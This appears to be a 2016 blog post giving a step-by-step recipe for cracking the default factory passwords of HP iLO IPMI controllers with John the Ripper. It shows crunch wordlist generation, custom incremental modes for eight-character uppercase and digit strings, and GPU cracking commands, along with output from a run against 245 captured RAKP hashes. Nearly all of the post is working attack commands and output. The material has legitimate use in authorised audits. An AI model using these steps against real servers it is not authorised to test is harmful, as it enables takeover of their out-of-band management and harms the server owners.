Thursday, October 13, 2016

let's crack default factory-shipped hp ilo passwords with john

let's crack default ipmi passwords from hp ilo.
yes let's, shall we?
  
 # mkdir -p /opt/john/dictionaries  
 # cd /opt/john/dictionaries
 # crunch 8 8 0123456789 > eightnum.lst <- 890M
 # crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ > eightalpha.lst <- 1T
 # ./john --session=ipmi32 --fork=8 --format=rakp \
 --wordlist=/opt/john/dictionaries/eightnum.lst out.john  

 gross
let's do it with both wordlists.
# ls /opt/john/dictionaries/ | xargs -t -I files \  
 ./john --session=ipmi32 --wordlist=/opt/john/dictionaries/files --rules \  
 --fork=8 --format=rakp out.john  
   
 now you can let it run against all the numbers and all the alpha. 
 --rules will do crazy upper and lower case (just in case).
although. you may forego using wordlists altogether if you're
doing simple alpha or num cracks. 
 
  go to /opt/john/john.conf and add the following stanza:  
   
 [Incremental:UpperEight]  
 File = $JOHN/upper.chr  
 MinLen = 8  
 MaxLen = 8  
 CharCount = 26  
   
that uses john's uppercase alphabet chr and parses through all 8 combinations of 26 letters.  
it may take forever, but, yay.  
   
 # ./john --fork=8 --incremental:UpperEight --format=rakp ./out.john  

here's something for hp's default random 8 character string of 10 digits:

 [Incremental:DigitsEight]
 File = $JOHN/upper.chr
 MinLen = 8
 MaxLen = 8
 CharCount = 10

 # ./john --fork=8 --incremental:DigitsEight --format=rakp ./out.john
for gpu cracking

first, always check how many gpus you have available  
   
 # nvida-smi  
   
 0, 1 under the GPU heading means you have two.  
   
 when passing the command line options to john,  
   
 get cracking:  
   
 # ./john --session=ipmiopencl --format=rakp-opencl --dev=0,1 --fork=2 ./out.john  
   
 * this means you're calling on devices 0 & 1 (as noted in nvidia-smi) and you are   
 forking the cracking job between the two of them.  
   
 Using default input encoding: UTF-8  
 Loaded 245 password hashes with 245 different salts (RAKP-opencl, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 OpenCL])  
 Remaining 116 password hashes with 116 different salts  
 Node numbers 1-2 of 2 (fork)  
 Device 1@crackingrig: Quadro NVS 295  
 Device 0@crackingrig: Quadro NVS 295  
   
 Press 'q' or Ctrl-C to abort, almost any other key for status  
   
 * if you press <enter> <enter>  
 2 0g 0:00:00:28 3/3 0g/s 27871p/s 479640c/s 479640C/s GPU:81°C batash..maglor  
 1 0g 0:00:00:28 3/3 0g/s 26870p/s 475151c/s 475151C/s GPU:77°C 123456..anitie  
   
 you'll see something similar to the above. notice that the GPU is not frying.  
   
 * nb the idea of cores does not apply to gpus, so stick to fork=2 or you might  
  have a really bad day. really. pay no attention to --list=cuda-devices and seeing:  
   
  Number of stream processors:  8 (1 x 8)   
   
  and that thought that it means --fork=8 per processor.   
   
  here're some numbers to dissuade you for brute-force processing:  
   
  0 0 0g 0:00:00:03 57.52% 1/3 (ETA: 15:30:49) 0g/s 191006p/s 191006c/s 191006C/s GPU:77°C GPU1:81°C administrator10..A3212  
  2 1 0g 0:00:00:02 74.16% 1/3 (ETA: 15:27:49) 0g/s 194691p/s 194691c/s 194691C/s GPU:78°C a5668..admior5632  
  4 4 0g 0:00:00:06 99.38% 1/3 (ETA: 15:26:34) 0g/s 50777p/s 50777c/s 50777C/s GPU:87°C administr3..a971905  
  8 5 0g 0:00:00:03 58.41% 1/3 (ETA: 15:25:17) 0g/s 25871p/s 25871c/s 25871C/s GPU:79°C 5505..A9691   
 16 5 0g 0:00:00:10 51.33% 1/3 (ETA: 15:24:10) 0g/s  3556p/s  3556c/s  3556C/s GPU:80°C A-214..Administrtor214
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)